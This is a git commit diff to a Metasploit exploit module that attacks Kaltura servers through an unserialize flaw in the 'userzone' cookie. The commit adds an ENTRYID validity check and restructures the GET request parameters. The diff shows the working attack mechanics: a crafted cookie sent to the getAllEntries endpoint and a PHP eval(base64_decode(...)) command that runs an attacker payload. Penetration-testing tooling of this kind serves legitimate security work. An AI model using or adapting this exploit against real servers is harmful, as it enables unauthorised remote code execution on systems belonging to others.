Add entry_id verification; clean up http request calls

2017-10-23 15:19:35 +02:00 · 2017-10-23 15:19:35 +02:00 · 0ac7e0926c
parent 30a86a1204
commit 0ac7e0926c
1 changed files with 29 additions and 4 deletions
--- a/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
+++ b/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
@ -74,7 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote

    res = send_request_cgi(
      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
      'headers' => {
        'Cookie' => "userzone=#{encoded}#{hash}"
      }
@ -85,12 +89,29 @@ class MetasploitModule < Msf::Exploit::Remote
      Exploit::CheckCode::Safe
    elsif res && res.body.include?(r)
      Exploit::CheckCode::Vulnerable
+    elsif not self.check_entryid()
+      print_error("Invalid ENTRYID")
+      Exploit::CheckCode::Safe
    else
-      print_warning("Did you use a valid entry_id?")
      Exploit::CheckCode::Safe
    end
  end

+  def check_entryid
+    entry_id = datastore['ENTRYID']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      }
+    )
+
+    return res.body.include? entry_id
+
+  end
+
  def exploit
    entry_id = datastore['ENTRYID']
    cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
@ -109,7 +130,11 @@ class MetasploitModule < Msf::Exploit::Remote

    res = send_request_cgi(
      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
      'headers' => {
        'Cookie' => "userzone=#{encoded}#{hash}"
      }
@ -118,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
    if res and res.redirect?
      print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
    elsif res and res.code != 200
-        print_error("Unexpected response...")
+        print_error('Unexpected response...')
    else
        print_status("Output: #{res.body}")
    end